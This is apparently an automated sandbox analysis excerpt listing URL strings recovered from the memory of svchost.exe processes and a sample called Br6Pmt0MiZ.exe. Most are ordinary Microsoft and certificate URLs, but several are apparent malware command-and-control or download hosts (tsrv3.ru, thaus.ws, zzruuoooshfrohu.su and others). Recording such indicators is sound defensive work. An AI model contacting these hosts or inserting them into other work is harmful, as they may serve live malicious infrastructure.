Source: svchost.exe, 00000021.00000002.585822034.00000229F1D00000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
Source: svchost.exe, 00000023.00000003.1115351406.0000019B89024000.00000004.00000001.sdmp	String found in binary or memory: http://crl4.digicert.com/ssca-sha2-g7.crl0L
Source: svchost.exe, 00000023.00000003.1114489682.0000019B88951000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1629325337.0000019B88930000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
Source: svchost.exe, 00000023.00000003.816342544.0000019B88954000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd05/soa
Source: svchost.exe, 00000023.00000003.816314444.0000019B8892E000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd1ZauYq
Source: svchost.exe, 00000023.00000003.814580553.0000019B8892E000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdAAAAAA
Source: svchost.exe, 00000023.00000003.816326206.0000019B8890E000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdP
Source: svchost.exe, 00000023.00000002.1629264372.0000019B88913000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsdTokenT
Source: svchost.exe, 00000023.00000002.1628490987.0000019B880D6000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.1115370021.0000019B8904B000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.1179608109.0000019B880F7000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.816326206.0000019B8890E000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
Source: svchost.exe, 00000023.00000003.1114489682.0000019B88951000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd(
Source: svchost.exe, 00000023.00000003.816326206.0000019B8890E000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd/04/xmle
Source: svchost.exe, 00000023.00000003.814580553.0000019B8892E000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdAAAAA
Source: svchost.exe, 00000023.00000003.816326206.0000019B8890E000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdP
Source: svchost.exe, 00000023.00000003.816326206.0000019B8890E000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsdhod
Source: svchost.exe, 00000023.00000002.1628490987.0000019B880D6000.00000004.00000001.sdmp	String found in binary or memory: http://docs.oasis-open.org/wss/2004/XX/oasis-2004XX-wss-saml-token-profile-1.0#SAMLAssertionID
Source: svchost.exe, 00000021.00000002.585822034.00000229F1D00000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.1115351406.0000019B89024000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0
Source: svchost.exe, 00000004.00000003.598230422.00000201AC804000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0:
Source: svchost.exe, 00000023.00000003.1115351406.0000019B89024000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.com0F
Source: svchost.exe, 00000023.00000002.1628283873.0000019B88086000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootCA.crlhttp://crl4.digicert.com/Di
Source: svchost.exe, 00000023.00000002.1628490987.0000019B880D6000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/ssca-sha2-g7.crlhttp://crl4.digicert.com/ssca-sha2-
Source: svchost.exe, 00000004.00000002.598452673.00000201A7013000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.msocsp.com0
Source: svchost.exe, 00000023.00000002.1631041712.0000019B89002000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp	String found in binary or memory: http://passport.net/tb
Source: svchost.exe, 00000023.00000002.1628003348.0000019B8802A000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.microsoft.0G
Source: svchost.exe, 00000023.00000003.816291568.0000019B88960000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous
Source: svchost.exe, 00000023.00000002.1629367981.0000019B88937000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy
Source: svchost.exe, 00000023.00000003.1114489682.0000019B88951000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/09/policy200
Source: svchost.exe, 00000023.00000002.1629367981.0000019B88937000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sc
Source: svchost.exe, 00000023.00000002.1629367981.0000019B88937000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/sccect
Source: svchost.exe, 00000023.00000002.1629367981.0000019B88937000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scerence
Source: svchost.exe, 00000023.00000002.1629367981.0000019B88937000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scs-cbc
Source: svchost.exe, 00000023.00000003.1114489682.0000019B88951000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/scsis-200
Source: svchost.exe, 00000023.00000002.1629367981.0000019B88937000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust
Source: svchost.exe, 00000023.00000003.822503948.0000019B88976000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust(
Source: svchost.exe, 00000023.00000002.1629367981.0000019B88937000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.814580553.0000019B8892E000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/Issue
Source: svchost.exe, 00000023.00000002.1629367981.0000019B88937000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RST/Issue
Source: svchost.exe, 00000023.00000002.1629367981.0000019B88937000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trust/RSTR/Issue
Source: svchost.exe, 00000023.00000002.1629367981.0000019B88937000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/02/trustnce
Source: svchost.exe, 00000001.00000002.1647181192.000000000082C000.00000004.00000001.sdmp	String found in binary or memory: http://tha.215.113.10/1
Source: Br6Pmt0MiZ.exe	String found in binary or memory: http://thaus.ws/
Source: svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://thaus.ws/1
Source: svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://thaus.ws/2
Source: svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://thaus.ws/3
Source: svchost.exe, 00000001.00000003.1070718306.0000000000870000.00000004.00000001.sdmp	String found in binary or memory: http://thaus.ws/4
Source: svchost.exe, 00000001.00000003.1070718306.0000000000870000.00000004.00000001.sdmp, svchost.exe, 00000001.00000003.889514943.0000000000875000.00000004.00000001.sdmp	String found in binary or memory: http://thaus.ws/5
Source: svchost.exe, 00000001.00000003.1070718306.0000000000870000.00000004.00000001.sdmp	String found in binary or memory: http://thaus.ws/6
Source: Br6Pmt0MiZ.exe	String found in binary or memory: http://tldrbox.top/
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://tldrbox.top/1
Source: svchost.exe, 00000001.00000003.1207227370.0000000000885000.00000004.00000001.sdmp	String found in binary or memory: http://tldrbox.top/2
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://tldrbox.top/3
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://tldrbox.top/4
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://tldrbox.top/5
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://tldrbox.top/6
Source: Br6Pmt0MiZ.exe	String found in binary or memory: http://tsrv3.ru/
Source: svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv3.ru/1
Source: svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv3.ru/2
Source: svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv3.ru/3
Source: svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv3.ru/4
Source: svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv3.ru/5
Source: svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv3.ru/6
Source: Br6Pmt0MiZ.exe	String found in binary or memory: http://tsrv3.ru/Host
Source: Br6Pmt0MiZ.exe	String found in binary or memory: http://tsrv4.ws/
Source: svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv4.ws/1
Source: svchost.exe, 00000001.00000003.637078208.000000000086C000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv4.ws/2
Source: svchost.exe, 00000001.00000003.682340835.0000000000838000.00000004.00000001.sdmp, svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv4.ws/3
Source: svchost.exe, 00000001.00000003.773788185.0000000000838000.00000004.00000001.sdmp, svchost.exe, 00000001.00000003.728521022.000000000086C000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv4.ws/4
Source: svchost.exe, 00000001.00000003.773788185.0000000000838000.00000004.00000001.sdmp, svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv4.ws/5
Source: svchost.exe, 00000001.00000003.819055029.000000000086C000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv4.ws/6
Source: Br6Pmt0MiZ.exe	String found in binary or memory: http://tsrv5.top/
Source: svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv5.top/1
Source: svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv5.top/2
Source: svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv5.top/3
Source: svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv5.top/4
Source: svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv5.top/5
Source: svchost.exe, 00000001.00000002.1647086876.0000000000812000.00000004.00000001.sdmp	String found in binary or memory: http://tsrv5.top/6
Source: svchost.exe, 00000021.00000003.563266655.00000229F1D5F000.00000004.00000001.sdmp	String found in binary or memory: http://universalstore.streaming.mediaservice
Source: svchost.exe, 00000021.00000003.563266655.00000229F1D5F000.00000004.00000001.sdmp	String found in binary or memory: http://universalstore.streaming.mediaservicendow
Source: svchost.exe, 00000025.00000002.959300994.000001A943E70000.00000002.00000001.sdmp	String found in binary or memory: http://wellformedweb.org/CommentAPI/
Source: svchost.exe, 0000000F.00000002.309600013.00000222DD013000.00000004.00000001.sdmp	String found in binary or memory: http://www.bingmapsportal.com
Source: svchost.exe, 00000021.00000003.563266655.00000229F1D5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplementa
Source: svchost.exe, 00000021.00000003.563266655.00000229F1D5F000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplementa8
Source: svchost.exe, 00000021.00000003.562826880.00000229F1D5B000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.562652421.00000229F1DB5000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.562448678.00000229F1D79000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/G5_End_User_License_Supplemental_Terms
Source: svchost.exe, 00000021.00000003.563266655.00000229F1D5F000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.562448678.00000229F1D79000.00000004.00000001.sdmp	String found in binary or memory: http://www.g5e.com/termsofservice
Source: svchost.exe, 00000021.00000003.561230116.00000229F1D9A000.00000004.00000001.sdmp	String found in binary or memory: http://www.hulu.com/privacy
Source: svchost.exe, 00000021.00000003.561230116.00000229F1D9A000.00000004.00000001.sdmp	String found in binary or memory: http://www.hulu.com/terms
Source: Br6Pmt0MiZ.exe	String found in binary or memory: http://zzruuoooshfrohu.su/
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://zzruuoooshfrohu.su/1
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://zzruuoooshfrohu.su/2http://zzruuoooshfrohu.su/2http://zzruuoooshfrohu.su/3http://zzruuoooshfr
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://zzruuoooshfrohu.su/4http://zzruuoooshfrohu.su/6
Source: svchost.exe, 00000001.00000003.1070697316.0000000000873000.00000004.00000001.sdmp	String found in binary or memory: http://zzruuoooshfrohu.su/5
Source: svchost.exe, 00000001.00000002.1647332967.0000000000862000.00000004.00000001.sdmp	String found in binary or memory: http://zzruuoooshfrohu.su/5http://zzruuoooshfrohu.su/6
Source: svchost.exe, 0000000C.00000002.1646758473.000001A8D4040000.00000004.00000001.sdmp	String found in binary or memory: https://%s.dnet.xboxlive.com
Source: svchost.exe, 0000000C.00000002.1646758473.000001A8D4040000.00000004.00000001.sdmp	String found in binary or memory: https://%s.xboxlive.com
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp	String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502
Source: svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://account.live.com/InlineSignup.aspx?iww=1&id=80502s(
Source: svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813619898.0000019B8892E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.814170778.0000019B8893B000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813740249.0000019B88950000.00000004.00000001.sdmp	String found in binary or memory: https://account.live.com/Wizard/Password/Change?id=80601
Source: svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813619898.0000019B8892E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813740249.0000019B88950000.00000004.00000001.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813619898.0000019B8892E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813740249.0000019B88950000.00000004.00000001.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813681795.0000019B88977000.00000004.00000001.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813681795.0000019B88977000.00000004.00000001.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.814222545.0000019B88930000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813681795.0000019B88977000.00000004.00000001.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80600
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601
Source: svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80601igning
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80603
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80604
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp	String found in binary or memory: https://account.live.com/inlinesignup.aspx?iww=1&id=80605
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.814222545.0000019B88930000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813681795.0000019B88977000.00000004.00000001.sdmp	String found in binary or memory: https://account.live.com/msangcwam
Source: svchost.exe, 0000000C.00000002.1646758473.000001A8D4040000.00000004.00000001.sdmp	String found in binary or memory: https://activity.windows.com
Source: svchost.exe, 0000000F.00000003.309293149.00000222DD061000.00000004.00000001.sdmp	String found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
Source: svchost.exe, 0000000C.00000002.1646758473.000001A8D4040000.00000004.00000001.sdmp	String found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 0000000C.00000002.1646758473.000001A8D4040000.00000004.00000001.sdmp	String found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
Source: svchost.exe, 00000021.00000003.570222195.00000229F1D57000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.570107516.00000229F1D99000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/contact/
Source: svchost.exe, 00000021.00000003.570222195.00000229F1D57000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.570107516.00000229F1D99000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.570181616.00000229F1D25000.00000004.00000001.sdmp	String found in binary or memory: https://corp.roblox.com/parents/
Source: svchost.exe, 0000000F.00000003.309308197.00000222DD04A000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000F.00000003.309293149.00000222DD061000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
Source: svchost.exe, 0000000F.00000002.309640507.00000222DD03E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
Source: svchost.exe, 0000000F.00000003.309293149.00000222DD061000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
Source: svchost.exe, 0000000F.00000003.309284511.00000222DD050000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 0000000F.00000002.309612750.00000222DD029000.00000004.00000001.sdmp	String found in binary or memory: https://dev.ditu.live.com/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 0000000F.00000003.287570838.00000222DD031000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
Source: svchost.exe, 0000000F.00000002.309640507.00000222DD03E000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
Source: svchost.exe, 0000000F.00000003.309293149.00000222DD061000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
Source: svchost.exe, 0000000F.00000003.309293149.00000222DD061000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
Source: svchost.exe, 0000000F.00000003.309293149.00000222DD061000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
Source: svchost.exe, 0000000F.00000003.287570838.00000222DD031000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
Source: svchost.exe, 0000000F.00000003.309338659.00000222DD042000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
Source: svchost.exe, 0000000F.00000003.309338659.00000222DD042000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
Source: svchost.exe, 0000000F.00000003.309293149.00000222DD061000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
Source: svchost.exe, 0000000F.00000002.309651963.00000222DD04C000.00000004.00000001.sdmp	String found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
Source: svchost.exe, 00000001.00000003.682357182.000000000083D000.00000004.00000001.sdmp	String found in binary or memory: https://div4.ws/1
Source: svchost.exe, 0000000F.00000003.309308197.00000222DD04A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
Source: svchost.exe, 0000000F.00000002.309651963.00000222DD04C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
Source: svchost.exe, 0000000F.00000002.309651963.00000222DD04C000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
Source: svchost.exe, 0000000F.00000003.309284511.00000222DD050000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.309338659.00000222DD042000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.309308197.00000222DD04A000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t
Source: svchost.exe, 0000000F.00000003.309293149.00000222DD061000.00000004.00000001.sdmp	String found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
Source: svchost.exe, 0000000F.00000002.309640507.00000222DD03E000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
Source: svchost.exe, 0000000F.00000003.287570838.00000222DD031000.00000004.00000001.sdmp	String found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
Source: svchost.exe, 00000021.00000003.570222195.00000229F1D57000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.570107516.00000229F1D99000.00000004.00000001.sdmp	String found in binary or memory: https://en.help.roblox.com/hc/en-us
Source: svchost.exe, 00000021.00000003.563266655.00000229F1D5F000.00000004.00000001.sdmp, svchost.exe, 00000021.00000003.562448678.00000229F1D79000.00000004.00000001.sdmp	String found in binary or memory: https://instagram.com/hiddencity_
Source: svchost.exe, 00000023.00000003.814170778.0000019B8893B000.00000004.00000001.sdmp	String found in binary or memory: https://login.li8
Source: svchost.exe, 00000023.00000003.813637250.0000019B8893B000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ApproveSession.srf
Source: svchost.exe, 00000023.00000003.813619898.0000019B8892E000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813619898.0000019B8892E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813740249.0000019B88950000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 00000023.00000003.813841406.0000019B88929000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813619898.0000019B8892E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.813740249.0000019B88950000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 00000023.00000003.813947187.0000019B8890E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80502
Source: svchost.exe, 00000023.00000003.813947187.0000019B8890E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80600
Source: svchost.exe, 00000023.00000003.813947187.0000019B8890E000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/IfExists.srf?uiflavor=4&id=80601
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ListSessions.srf
Source: svchost.exe, 00000023.00000003.813637250.0000019B8893B000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ManageApprover.srf
Source: svchost.exe, 00000023.00000003.813637250.0000019B8893B000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ManageLoginKeys.srf
Source: svchost.exe, 00000023.00000002.1628243656.0000019B88079000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.1179648365.0000019B88102000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1629264372.0000019B88913000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/RST2.srf
Source: svchost.exe, 00000023.00000003.814533157.0000019B88948000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.1179648365.0000019B88102000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/didtou.srf
Source: svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/getrealminfo.srf
Source: svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/getuserrealm.srf
Source: svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceAssociate.srf
Source: svchost.exe, 00000023.00000003.816291568.0000019B88960000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.1179648365.0000019B88102000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceDisassociate.srf
Source: svchost.exe, 00000023.00000003.813637250.0000019B8893B000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.1179648365.0000019B88102000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceQuery.srf
Source: svchost.exe, 00000023.00000003.813782021.0000019B88963000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.1179648365.0000019B88102000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/DeviceUpdate.srf
Source: svchost.exe, 00000023.00000003.816291568.0000019B88960000.00000004.00000001.sdmp, svchost.exe, 00000023.00000003.1179648365.0000019B88102000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/EnumerateDevices.srf
Source: svchost.exe, 00000023.00000003.813637250.0000019B8893B000.00000004.00000001.sdmp, svchost.exe, 00000023.00000002.1628118872.0000019B8805D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srf
Source: svchost.exe, 00000023.00000002.1628041871.0000019B8803D000.00000004.00000001.sdmp	String found in binary or memory: https://login.live.com/ppsecure/GetAppData.srfrfrf6085fid=cplive.com
